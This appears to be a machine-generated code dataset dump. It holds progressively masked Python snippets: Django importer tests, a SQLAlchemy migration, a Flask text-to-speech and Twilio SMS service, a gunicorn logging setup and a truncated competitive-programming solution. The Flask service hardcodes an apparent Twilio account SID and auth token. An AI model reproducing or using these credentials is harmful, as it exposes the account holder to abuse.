def test_get_collection_no_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls not available in given item id\n \"\"\"\n # Arrange\n mock_resp = MockResponse({}, 200)\n mock_get.return_value = mock_resp\n\n # Act\n response = get_collection_item_asset_urls(self.item_id)\n\n # Assert\n self.assertListEqual(response, [])\n\n\nclass DownloadWriteCollcetionItemAssetTest(TestCase):\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_asset_item(self, mock_get):\n \"\"\"\n Testing download image and write into disk without error\n \"\"\"\n # Arrange\n mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)\n mock_get.return_value = mock_resp\n m = mock_open()\n\n with patch(\"__main__.open\", m, create=True):\n\n # Act\n abc = download_write_collection_item_asset(\"dumy/image/url\", \"foo\")\n\n # Assert\n self.assertEquals(abc, True)\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_asset_item_error(self, mock_get):\n \"\"\"\n Testing download image with exception\n \"\"\"\n # Arrange\n mock_resp = MockResponse({}, 200, content=Exception(\"boom\"))\n mock_get.return_value = mock_resp\n m = mock_open()\n\n with patch(\"__main__.open\", m, create=True):\n\n # Act\n abc = download_write_collection_item_asset(\"dumy/image/url\", \"foo\")\n\n # Assert\n self.assertEquals(abc, False)\n\n\nclass DownloadWriteCollectionItemAssetsTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = \"branch-rickey-papers\"\n self.project = \"test-project\"\n self.item_id = \"mss37820001\"\n self.url = \"https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971\"\n\n @patch(\"importer.tasks.get_save_item_assets\")\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_collection_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url\n \"\"\"\n # Arrange\n\n collection = {\n \"collection_name\": self.name,\n \"collection_slug\": slugify(self.name),\n \"collection_task_id\": \"123\",\n \"subcollection_name\": self.project,\n \"subcollection_slug\": slugify(self.project),\n }\n CollectionTaskDetails.objects.create(**collection)\n\n mock_resp_page = MockResponse({\"pagination\": {\"total\": 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [\n mock_resp_page,\n mock_page1_result,\n mock_page2_result,\n mock_resp_item_urls,\n ]\n mock_save.return_value = None\n\n # Act\n download_write_collection_item_assets(self.name, self.project, self.url)\n\n ctd = CollectionTaskDetails.objects.get(\n collection_slug=self.name, subcollection_slug=self.project\n )\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)\n\n # Assert\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch(\"importer.tasks.get_save_item_assets\")\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_collection_item_asstes_no_db_entry(\n self, mock_get, mock_save\n ):\n \"\"\"\n Testing no of 
collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails\n \"\"\"\n # Arrange\n mock_resp_page = MockResponse({\"pagination\": {\"total\": 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [\n mock_resp_page,\n mock_page1_result,\n mock_page2_result,\n mock_resp_item_urls,\n ]\n mock_save.return_value = None\n\n # Act\n download_write_collection_item_assets(self.name, self.project, self.url)\n\n ctd = CollectionTaskDetails.objects.get(\n collection_slug=self.name, subcollection_slug=self.project\n )\n ciac = CollectionItemAssetCount.objects.get(\n collection_task=ctd, collection_item_identifier=self.item_id\n )\n\n # Assert\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n\nclass DownloadWriteItemAssetsTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = \"branch-rickey-papers\"\n self.project = \"test-project\"\n self.item_id = \"mss37820001\"\n\n @patch(\"importer.tasks.get_save_item_assets\")\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n # Arrange\n\n collection = {\n \"collection_name\": self.name,\n \"collection_slug\": slugify(self.name),\n \"collection_task_id\": \"123\",\n \"subcollection_name\": self.project,\n \"subcollection_slug\": slugify(self.project),\n }\n CollectionTaskDetails.objects.create(**collection)\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n\n # Act\n download_write_item_assets(self.name, self.project, self.item_id)\n\n ctd = CollectionTaskDetails.objects.get(\n collection_slug=self.name, subcollection_slug=self.project\n )\n ciac = CollectionItemAssetCount.objects.get(\n collection_task=ctd, collection_item_identifier=self.item_id\n )\n\n # Assert\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch(\"importer.tasks.get_save_item_assets\")\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails\n \"\"\"\n # Arrange\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n\n # Act\n download_write_item_assets(self.name, self.project, self.item_id)\n\n ctd = CollectionTaskDetails.objects.get(\n collection_slug=self.name, subcollection_slug=self.project\n )\n ciac = CollectionItemAssetCount.objects.get(\n collection_task=ctd, collection_item_identifier=self.item_id\n )\n\n # Assert\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n",
"step-ids": [
16,
25,
31,
33,
38
]
}
|
[
16,
25,
31,
33,
38
] |
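
The tests in the record above all follow one pattern: patch `importer.tasks.requests.get` and hand back a stub response object. A minimal, self-contained sketch of that pattern outside Django; `fetch_temp` and its URL are invented for illustration:

import requests
from unittest import TestCase, main
from unittest.mock import patch

class FakeResponse:
    # Stand-in for requests.Response, exposing only what the code under test reads.
    def __init__(self, json_data, status_code):
        self._json = json_data
        self.status_code = status_code

    def json(self):
        return self._json

def fetch_temp():
    # Hypothetical code under test; normally this would live in its own module.
    resp = requests.get("https://example.invalid/weather")
    return resp.json()["temp"] if resp.status_code == 200 else None

class FetchTempTest(TestCase):
    @patch("requests.get")  # replace requests.get for the duration of this test
    def test_ok(self, mock_get):
        mock_get.return_value = FakeResponse({"temp": 21}, 200)
        self.assertEqual(fetch_temp(), 21)

    @patch("requests.get")
    def test_bad_status(self, mock_get):
        mock_get.return_value = FakeResponse({}, 400)
        self.assertIsNone(fetch_temp())

if __name__ == "__main__":
    main()
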
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
meta = MetaData()
table = Table('accesses', meta, Column('id', BigInteger, primary_key=True,
nullable=False), Column('uuid', String(255), nullable=False), Column(
'created_at', DateTime))
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
<|reserved_special_token_1|>
from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer
from migrate import *
meta = MetaData()
table = Table('accesses', meta, Column('id', BigInteger, primary_key=True,
nullable=False), Column('uuid', String(255), nullable=False), Column(
'created_at', DateTime))
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
<|reserved_special_token_1|>
from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer
from migrate import *
meta = MetaData()
table = Table(
'accesses', meta,
Column('id', BigInteger, primary_key=True, nullable=False),
Column('uuid', String(255), nullable=False),
Column('created_at', DateTime),
)
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
|
flexible
|
{
"blob_id": "6154979cd2853dd2bd26d1ae5df7365efa0141c2",
"index": 441,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-3": "<mask token>\nmeta = MetaData()\ntable = Table('accesses', meta, Column('id', BigInteger, primary_key=True,\n nullable=False), Column('uuid', String(255), nullable=False), Column(\n 'created_at', DateTime))\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-4": "from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer\nfrom migrate import *\nmeta = MetaData()\ntable = Table('accesses', meta, Column('id', BigInteger, primary_key=True,\n nullable=False), Column('uuid', String(255), nullable=False), Column(\n 'created_at', DateTime))\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-5": "from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer\nfrom migrate import *\n\nmeta = MetaData()\ntable = Table(\n 'accesses', meta,\n Column('id', BigInteger, primary_key=True, nullable=False),\n Column('uuid', String(255), nullable=False),\n Column('created_at', DateTime),\n)\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
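
The migration above is the classic sqlalchemy-migrate shape: a module-level MetaData plus upgrade()/downgrade() functions that bind an engine and create or drop the table. A sketch of driving it by hand; the module name `accesses_migration` is hypothetical, and the MetaData.bind assignment assumes a pre-2.0 SQLAlchemy, since that attribute was removed in 2.0:

from sqlalchemy import create_engine, inspect
import accesses_migration as migration  # hypothetical import of the file above

engine = create_engine("sqlite://")          # throwaway in-memory database
migration.upgrade(engine)
assert "accesses" in inspect(engine).get_table_names()
migration.downgrade(engine)
assert "accesses" not in inspect(engine).get_table_names()
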
from flask import Flask, jsonify, request, send_file, render_template
from flask_cors import CORS
from twilio.rest import Client
import autocomplete
from gtts import gTTS
import os
# Set up the model.
autocomplete.load()
app = Flask(__name__)
CORS(app)
# The application
@app.route("/")
def index():
return render_template("index.html")
# Create a class for custom error messages (reference: http://flask.pocoo.org/docs/0.12/patterns/apierrors/).
class InvalidUsage(Exception):
status_code = 400
# Initialize the InvalidUsage exception.
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
# Convert the exception information into a dictionary.
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
# Register the custom exception with the error handler (reference: http://flask.pocoo.org/docs/0.12/patterns/apierrors/).
@app.errorhandler(InvalidUsage)
def handle_invalid_usage(error):
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
# Converts English text to speech.
@app.route('/convert_text_to_speech', methods=['POST'])
def convert_text_to_speech():
# Check to see if the required parameters are present.
if 'text_to_convert' not in request.values.keys():
raise InvalidUsage("No text included for conversion", status_code = 400)
# Send the post request.
tts = gTTS(text=request.values['text_to_convert'], lang='en')
tts.save('converted_text.mp3')
os.system('start converted_text.mp3')
# Return the sound file.
return send_file('converted_text.mp3', mimetype='audio/mpeg')
# Get suggestions for words that the user typed in.
@app.route('/get_suggestion', methods=['GET','POST'])
def get_suggestion():
# Raise an exception if the required parameters are not specified.
if "words" not in request.values.keys():
raise InvalidUsage("No words were specified for prediction.", status_code = 400)
# Predict the next word.
text = request.values['words']
	prediction = []
if len(text.split(" ")) > 1:
prediction = autocomplete.split_predict(text, 10)
else:
prediction = autocomplete.predict_currword(text, 10)
return jsonify(prediction)
# Adds text message support to allow Don to send text messages.
@app.route('/send_text', methods=['GET', 'POST'])
def send_text():
# Raise an exception if the required parameters are not specified.
if "text" not in request.values.keys():
raise InvalidUsage("The text message was not found in the request.", status_code = 400)
if "to" not in request.values.keys():
raise InvalidUsage("The to-number was not found in the request", status_code = 400)
# Extract the required information from the request body.
text = request.values['text']
to_number = request.values['to']
# Set up the account credentials - in a production project, this would be placed in a "secrets" file.
account_sid = "ACbbd2cff98bcbbad08f76b03701a0f2d9"
auth_token = "7d786ff14c6b4572a6e8e78f8ad6aee5"
# Send the text message.
client = Client(account_sid, auth_token)
message = client.messages.create(
from_="+12267992139",
to=to_number,
body=text)
return jsonify({"to":to_number, "message":message.body, "error code":message.error_code})
|
normal
|
{
"blob_id": "8980ac4db2657d3dbd2b70b33a4d13a077d4590e",
"index": 2266,
"step-1": "<mask token>\n\n\nclass InvalidUsage(Exception):\n status_code = 400\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n<mask token>\n\n\n@app.route('/get_suggestion', methods=['GET', 'POST'])\ndef get_suggestion():\n if 'words' not in request.values.keys():\n raise InvalidUsage('No words were specified for prediction.',\n status_code=400)\n text = request.values['words']\n prediction = []\n if len(text.split(' ')) > 1:\n prediction = autocomplete.split_predict(text, 10)\n else:\n prediction = autocomplete.predict_currword(text, 10)\n return jsonify(prediction)\n\n\n@app.route('/send_text', methods=['GET', 'POST'])\ndef send_text():\n if 'text' not in request.values.keys():\n raise InvalidUsage('The text message was not found in the request.',\n status_code=400)\n if 'to' not in request.values.keys():\n raise InvalidUsage('The to-number was not found in the request',\n status_code=400)\n text = request.values['text']\n to_number = request.values['to']\n account_sid = 'ACbbd2cff98bcbbad08f76b03701a0f2d9'\n auth_token = '7d786ff14c6b4572a6e8e78f8ad6aee5'\n client = Client(account_sid, auth_token)\n message = client.messages.create(from_='+12267992139', to=to_number,\n body=text)\n return jsonify({'to': to_number, 'message': message.body, 'error code':\n message.error_code})\n",
"step-2": "<mask token>\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\nclass InvalidUsage(Exception):\n status_code = 400\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n@app.route('/convert_text_to_speech', methods=['POST'])\ndef convert_text_to_speech():\n if 'text_to_convert' not in request.values.keys():\n raise InvalidUsage('No text included for conversion', status_code=400)\n tts = gTTS(text=request.values['text_to_convert'], lang='en')\n tts.save('converted_text.mp3')\n os.system('start converted_text.mp3')\n return send_file('converted_text.mp3', mimetype='audio/mpeg')\n\n\n@app.route('/get_suggestion', methods=['GET', 'POST'])\ndef get_suggestion():\n if 'words' not in request.values.keys():\n raise InvalidUsage('No words were specified for prediction.',\n status_code=400)\n text = request.values['words']\n prediction = []\n if len(text.split(' ')) > 1:\n prediction = autocomplete.split_predict(text, 10)\n else:\n prediction = autocomplete.predict_currword(text, 10)\n return jsonify(prediction)\n\n\n@app.route('/send_text', methods=['GET', 'POST'])\ndef send_text():\n if 'text' not in request.values.keys():\n raise InvalidUsage('The text message was not found in the request.',\n status_code=400)\n if 'to' not in request.values.keys():\n raise InvalidUsage('The to-number was not found in the request',\n status_code=400)\n text = request.values['text']\n to_number = request.values['to']\n account_sid = 'ACbbd2cff98bcbbad08f76b03701a0f2d9'\n auth_token = '7d786ff14c6b4572a6e8e78f8ad6aee5'\n client = Client(account_sid, auth_token)\n message = client.messages.create(from_='+12267992139', to=to_number,\n body=text)\n return jsonify({'to': to_number, 'message': message.body, 'error code':\n message.error_code})\n",
"step-3": "<mask token>\nautocomplete.load()\n<mask token>\nCORS(app)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\nclass InvalidUsage(Exception):\n status_code = 400\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n@app.route('/convert_text_to_speech', methods=['POST'])\ndef convert_text_to_speech():\n if 'text_to_convert' not in request.values.keys():\n raise InvalidUsage('No text included for conversion', status_code=400)\n tts = gTTS(text=request.values['text_to_convert'], lang='en')\n tts.save('converted_text.mp3')\n os.system('start converted_text.mp3')\n return send_file('converted_text.mp3', mimetype='audio/mpeg')\n\n\n@app.route('/get_suggestion', methods=['GET', 'POST'])\ndef get_suggestion():\n if 'words' not in request.values.keys():\n raise InvalidUsage('No words were specified for prediction.',\n status_code=400)\n text = request.values['words']\n prediction = []\n if len(text.split(' ')) > 1:\n prediction = autocomplete.split_predict(text, 10)\n else:\n prediction = autocomplete.predict_currword(text, 10)\n return jsonify(prediction)\n\n\n@app.route('/send_text', methods=['GET', 'POST'])\ndef send_text():\n if 'text' not in request.values.keys():\n raise InvalidUsage('The text message was not found in the request.',\n status_code=400)\n if 'to' not in request.values.keys():\n raise InvalidUsage('The to-number was not found in the request',\n status_code=400)\n text = request.values['text']\n to_number = request.values['to']\n account_sid = 'ACbbd2cff98bcbbad08f76b03701a0f2d9'\n auth_token = '7d786ff14c6b4572a6e8e78f8ad6aee5'\n client = Client(account_sid, auth_token)\n message = client.messages.create(from_='+12267992139', to=to_number,\n body=text)\n return jsonify({'to': to_number, 'message': message.body, 'error code':\n message.error_code})\n",
"step-4": "<mask token>\nautocomplete.load()\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\nclass InvalidUsage(Exception):\n status_code = 400\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n@app.route('/convert_text_to_speech', methods=['POST'])\ndef convert_text_to_speech():\n if 'text_to_convert' not in request.values.keys():\n raise InvalidUsage('No text included for conversion', status_code=400)\n tts = gTTS(text=request.values['text_to_convert'], lang='en')\n tts.save('converted_text.mp3')\n os.system('start converted_text.mp3')\n return send_file('converted_text.mp3', mimetype='audio/mpeg')\n\n\n@app.route('/get_suggestion', methods=['GET', 'POST'])\ndef get_suggestion():\n if 'words' not in request.values.keys():\n raise InvalidUsage('No words were specified for prediction.',\n status_code=400)\n text = request.values['words']\n prediction = []\n if len(text.split(' ')) > 1:\n prediction = autocomplete.split_predict(text, 10)\n else:\n prediction = autocomplete.predict_currword(text, 10)\n return jsonify(prediction)\n\n\n@app.route('/send_text', methods=['GET', 'POST'])\ndef send_text():\n if 'text' not in request.values.keys():\n raise InvalidUsage('The text message was not found in the request.',\n status_code=400)\n if 'to' not in request.values.keys():\n raise InvalidUsage('The to-number was not found in the request',\n status_code=400)\n text = request.values['text']\n to_number = request.values['to']\n account_sid = 'ACbbd2cff98bcbbad08f76b03701a0f2d9'\n auth_token = '7d786ff14c6b4572a6e8e78f8ad6aee5'\n client = Client(account_sid, auth_token)\n message = client.messages.create(from_='+12267992139', to=to_number,\n body=text)\n return jsonify({'to': to_number, 'message': message.body, 'error code':\n message.error_code})\n",
"step-5": "from flask import Flask, jsonify, request, send_file, render_template\nfrom flask_cors import CORS\nfrom twilio.rest import Client\nimport autocomplete\nfrom gtts import gTTS\nimport os\n\n# Set up the model.\nautocomplete.load()\napp = Flask(__name__)\nCORS(app)\n\n# The application\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\n# Create a class for custom error messages (reference: http://flask.pocoo.org/docs/0.12/patterns/apierrors/).\nclass InvalidUsage(Exception):\n\tstatus_code = 400\n\n\t# Initialize the InvalidUsage exception.\n\tdef __init__(self, message, status_code=None, payload=None):\n\t\tException.__init__(self)\n\t\tself.message = message\n\t\tif status_code is not None:\n\t\t\tself.status_code = status_code\n\t\tself.payload = payload\n\n\t# Convert the exception information into a dictionary.\n\tdef to_dict(self):\n\t\trv = dict(self.payload or ())\n\t\trv['message'] = self.message\n\t\treturn rv\n\n# Register the custom exception with the error handler (reference: http://flask.pocoo.org/docs/0.12/patterns/apierrors/).\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n\tresponse = jsonify(error.to_dict())\n\tresponse.status_code = error.status_code\n\treturn response\n\n# Converts English text to speech.\n@app.route('/convert_text_to_speech', methods=['POST'])\ndef convert_text_to_speech():\n\t# Check to see if the required parameters are present.\n\tif 'text_to_convert' not in request.values.keys():\n\t\traise InvalidUsage(\"No text included for conversion\", status_code = 400)\n\t\t\n\t# Send the post request.\n\ttts = gTTS(text=request.values['text_to_convert'], lang='en')\n\ttts.save('converted_text.mp3')\n\tos.system('start converted_text.mp3')\n\t\n\t# Return the sound file.\n\treturn send_file('converted_text.mp3', mimetype='audio/mpeg')\n\n# Get suggestions for words that the user typed in.\n@app.route('/get_suggestion', methods=['GET','POST'])\ndef get_suggestion():\n\t# Raise an exception if the required parameters are not specified.\n\tif \"words\" not in request.values.keys():\n\t\traise InvalidUsage(\"No words were specified for prediction.\", status_code = 400)\n\t\n\t# Predict the next word.\n\ttext = request.values['words']\n\tprediction = [];\n\tif len(text.split(\" \")) > 1:\n\t\tprediction = autocomplete.split_predict(text, 10)\n\telse:\n\t\tprediction = autocomplete.predict_currword(text, 10)\n\t\t\n\treturn jsonify(prediction)\n\t\n# Adds text message support to allow Don to send text messages.\n@app.route('/send_text', methods=['GET', 'POST'])\ndef send_text():\n\t# Raise an exception if the required parameters are not specified.\n\tif \"text\" not in request.values.keys():\n\t\traise InvalidUsage(\"The text message was not found in the request.\", status_code = 400)\n\tif \"to\" not in request.values.keys():\n\t\traise InvalidUsage(\"The to-number was not found in the request\", status_code = 400)\n\t\n\t# Extract the required information from the request body.\n\ttext = request.values['text']\n\tto_number = request.values['to']\n\t\n\t# Set up the account credentials - in a production project, this would be placed in a \"secrets\" file.\n\taccount_sid = \"ACbbd2cff98bcbbad08f76b03701a0f2d9\"\n\tauth_token = \"7d786ff14c6b4572a6e8e78f8ad6aee5\"\n\t\n\t# Send the text message.\n\tclient = Client(account_sid, auth_token)\n\tmessage = client.messages.create(\n\t\tfrom_=\"+12267992139\",\n\t\tto=to_number,\n\t\tbody=text)\n\n\treturn jsonify({\"to\":to_number, \"message\":message.body, \"error 
code\":message.error_code})\n\t",
"step-ids": [
7,
9,
10,
11,
13
]
}
|
[
7,
9,
10,
11,
13
] |
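
A quick way to exercise the API above from another process is plain requests calls; a sketch, with the local host and development port assumed:

import requests

BASE = "http://127.0.0.1:5000"   # assumes the Flask app runs locally on the default port

r = requests.post(f"{BASE}/get_suggestion", data={"words": "good mor"})
print(r.json())                               # list of predicted completions

r = requests.post(f"{BASE}/convert_text_to_speech",
                  data={"text_to_convert": "hello"})
with open("hello.mp3", "wb") as f:            # the endpoint streams back MP3 audio
    f.write(r.content)
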
import logging
import os
import logzero
from gunicorn.glogging import Logger
_log_level = os.environ.get("LOG_LEVEL", "info").upper()
log_level = getattr(logging, _log_level)
log_format = "%(color)s[%(levelname)1.1s %(asctime)s %(name)s]%(end_color)s %(message)s"
formatter = logzero.LogFormatter(fmt=log_format)
logger_args = dict(level=log_level, formatter=formatter)
logzero.__name__ = ""
logzero.setup_logger(**logger_args)
logzero.setup_default_logger(**logger_args)
logger = logzero.setup_logger("alertmanager_telegram", **logger_args)
class GunicornLogger(Logger):
def __init__(self, cfg):
super().__init__(cfg)
self.error_log = logzero.setup_logger("gunicorn", **logger_args)
|
normal
|
{
"blob_id": "b8b50ef021c4b25edbab355e1db5d62d3c5a28ad",
"index": 7257,
"step-1": "<mask token>\n\n\nclass GunicornLogger(Logger):\n <mask token>\n",
"step-2": "<mask token>\nlogzero.setup_logger(**logger_args)\nlogzero.setup_default_logger(**logger_args)\n<mask token>\n\n\nclass GunicornLogger(Logger):\n\n def __init__(self, cfg):\n super().__init__(cfg)\n self.error_log = logzero.setup_logger('gunicorn', **logger_args)\n",
"step-3": "<mask token>\n_log_level = os.environ.get('LOG_LEVEL', 'info').upper()\nlog_level = getattr(logging, _log_level)\nlog_format = (\n '%(color)s[%(levelname)1.1s %(asctime)s %(name)s]%(end_color)s %(message)s'\n )\nformatter = logzero.LogFormatter(fmt=log_format)\nlogger_args = dict(level=log_level, formatter=formatter)\nlogzero.__name__ = ''\nlogzero.setup_logger(**logger_args)\nlogzero.setup_default_logger(**logger_args)\nlogger = logzero.setup_logger('alertmanager_telegram', **logger_args)\n\n\nclass GunicornLogger(Logger):\n\n def __init__(self, cfg):\n super().__init__(cfg)\n self.error_log = logzero.setup_logger('gunicorn', **logger_args)\n",
"step-4": "import logging\nimport os\nimport logzero\nfrom gunicorn.glogging import Logger\n_log_level = os.environ.get('LOG_LEVEL', 'info').upper()\nlog_level = getattr(logging, _log_level)\nlog_format = (\n '%(color)s[%(levelname)1.1s %(asctime)s %(name)s]%(end_color)s %(message)s'\n )\nformatter = logzero.LogFormatter(fmt=log_format)\nlogger_args = dict(level=log_level, formatter=formatter)\nlogzero.__name__ = ''\nlogzero.setup_logger(**logger_args)\nlogzero.setup_default_logger(**logger_args)\nlogger = logzero.setup_logger('alertmanager_telegram', **logger_args)\n\n\nclass GunicornLogger(Logger):\n\n def __init__(self, cfg):\n super().__init__(cfg)\n self.error_log = logzero.setup_logger('gunicorn', **logger_args)\n",
"step-5": "import logging\nimport os\n\nimport logzero\nfrom gunicorn.glogging import Logger\n\n_log_level = os.environ.get(\"LOG_LEVEL\", \"info\").upper()\nlog_level = getattr(logging, _log_level)\nlog_format = \"%(color)s[%(levelname)1.1s %(asctime)s %(name)s]%(end_color)s %(message)s\"\n\nformatter = logzero.LogFormatter(fmt=log_format)\nlogger_args = dict(level=log_level, formatter=formatter)\n\nlogzero.__name__ = \"\"\nlogzero.setup_logger(**logger_args)\nlogzero.setup_default_logger(**logger_args)\nlogger = logzero.setup_logger(\"alertmanager_telegram\", **logger_args)\n\n\nclass GunicornLogger(Logger):\n def __init__(self, cfg):\n super().__init__(cfg)\n\n self.error_log = logzero.setup_logger(\"gunicorn\", **logger_args)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
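
GunicornLogger above exists so gunicorn's own error log can be swapped onto the logzero formatter; gunicorn accepts such a class through its logger_class setting. A sketch of both sides, with the import path invented:

# Command-line wiring (module path is hypothetical):
#   LOG_LEVEL=debug gunicorn app:app --logger-class myapp.logsetup.GunicornLogger
from myapp.logsetup import logger             # hypothetical import path

logger.info("service starting")               # rendered by logzero's LogFormatter
logger.debug("only shown when LOG_LEVEL=debug")
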
<|reserved_special_token_0|>
def run():
mod = 1000000007
N, *AB = map(int, read().split())
A_B = []
INF = float('inf')
zerozero = 0
for i in range(N):
a = AB[2 * i]
b = AB[2 * i + 1]
if a == 0 and b == 0:
zerozero += 1
elif b == 0:
A_B.append((INF, 0))
elif a == 0:
A_B.append((0, INF))
else:
tmp = math.gcd(a, b)
if a / b > 0:
v = 1
else:
v = -1
A_B.append((abs(a // tmp), v * abs(b // tmp)))
comb_dict = defaultdict(lambda : [0, 0])
for ai, bi in A_B:
if ai == INF:
comb_dict[0][1] += 1
elif bi == INF:
comb_dict[0][0] += 1
elif bi < 0:
comb_dict[ai, bi][0] += 1
else:
comb_dict[bi, -ai][1] += 1
ret = 1
for _, val_list in comb_dict.items():
a, b = val_list
if a == 0 or b == 0:
ret *= pow(2, max(a, b), mod)
else:
ret *= pow(2, a, mod) + pow(2, b, mod) - 1
ret %= mod
ret += zerozero - 1
print(ret % mod)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.setrecursionlimit(10 ** 7)
<|reserved_special_token_0|>
def run():
mod = 1000000007
N, *AB = map(int, read().split())
A_B = []
INF = float('inf')
zerozero = 0
for i in range(N):
a = AB[2 * i]
b = AB[2 * i + 1]
if a == 0 and b == 0:
zerozero += 1
elif b == 0:
A_B.append((INF, 0))
elif a == 0:
A_B.append((0, INF))
else:
tmp = math.gcd(a, b)
if a / b > 0:
v = 1
else:
v = -1
A_B.append((abs(a // tmp), v * abs(b // tmp)))
comb_dict = defaultdict(lambda : [0, 0])
